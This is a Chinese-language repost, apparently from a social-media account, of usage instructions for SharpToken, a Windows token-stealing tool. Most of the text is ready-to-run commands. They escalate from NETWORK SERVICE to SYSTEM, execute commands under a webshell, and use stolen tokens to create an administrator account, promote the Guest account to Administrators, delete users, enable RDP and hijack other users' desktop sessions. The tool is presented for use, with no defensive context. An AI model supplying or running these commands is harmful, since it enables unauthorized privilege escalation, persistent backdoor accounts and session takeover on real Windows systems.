关注我们 | 发现更多精彩内容
SharpToken By BeichenDream
=========================================================
Github : https://github.com/BeichenDream/SharpToken
If you are an NT AUTHORITY\NETWORK SERVICE user then you just need to add the bypass parameter to become an NT AUTHORIT\YSYSTEM
e.g.
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
Usage:
SharpToken COMMAND arguments
COMMANDS:
list_token [process pid] [bypass]
list_all_token [process pid] [bypass]
add_user <username> <password> [group] [domain] [bypass]
enableUser <username> <NewPassword> [NewGroup] [bypass]
delete_user <username> [domain] [bypass]
execute <tokenUser> <commandLine> [Interactive] [bypass]
enableRDP [bypass]
tscon <targetSessionId> [sourceSessionId] [bypass]
example:
SharpToken list_token
SharpToken list_token bypass
SharpToken list_token 6543
SharpToken add_user admin Abcd1234! Administrators
SharpToken enableUser Guest Abcd1234! Administrators
SharpToken delete_user admin
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami" bypass
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true
SharpToken execute "NT AUTHORITY\SYSTEM" cmd true bypass
SharpToken tscon 1
ListToken
枚举信息包括SID、LogonDomain、UserName、Session、LogonType、TokenType、TokenHandle(Duplicate后Token的句柄)、TargetProcessId(Token产生的进程)、TargetProcessToken(源进程中Token的句柄)、Groups(Token用户所在的组)位于)
SharpToken list_token
枚举来自指定进程的令牌
SharpToken list_token 468
获取交互式外壳
execute "NT AUTHORITY\SYSTEM" cmd true
获取命令执行结果(在webshell下执行)
SharpToken execute "NT AUTHORITY\SYSTEM" "cmd /c whoami"
使用窃取的令牌创建管理员用户
SharpToken add_user admin Abcd1234! Administrators
使用被盗令牌启用管理员用户
SharpToken enableUser Guest Abcd1234! Administrators
使用被盗令牌删除用户
SharpToken delete_user admin
使用窃取的Token切换到目标桌面
其中1是目标用户的桌面,2是我们要接收的桌面
SharpToken tscon 1 2
项目地址:
https://github.com/BeichenDream/SharpToken
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里